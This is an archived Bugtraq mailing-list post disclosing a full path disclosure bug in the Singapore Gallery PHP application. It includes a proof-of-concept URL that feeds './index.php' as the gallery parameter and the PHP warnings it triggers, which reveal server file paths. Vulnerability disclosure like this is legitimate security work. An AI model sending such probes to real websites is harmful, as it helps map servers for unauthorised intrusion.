Bugtraq mailing list archives
Singapore Gallery fullpath disclosure
From: hack2prison () yahoo com
Date: 14 Jun 2007 13:15:07 -0000
Reported by Freeprotect.NET member ------------------------------------------------ Singapore Gallery is open source code, it is nice and easy to use. It is provided by http://www.sgal.org However it contain an error: http://site.ext/index.php?gallery=./index.php Warning: opendir(/home/user/public_html/galleries/index.php/) [function.opendir]: failed to open dir: Not a directory in /home/user/public_html//includes/singapore.class.php on line 870 Warning: Invalid argument supplied for foreach() in /home/user/public_html/includes/io.class.php on line 129 ----------------------------------------------
Current thread:
- Singapore Gallery fullpath disclosure hack2prison (Jun 14)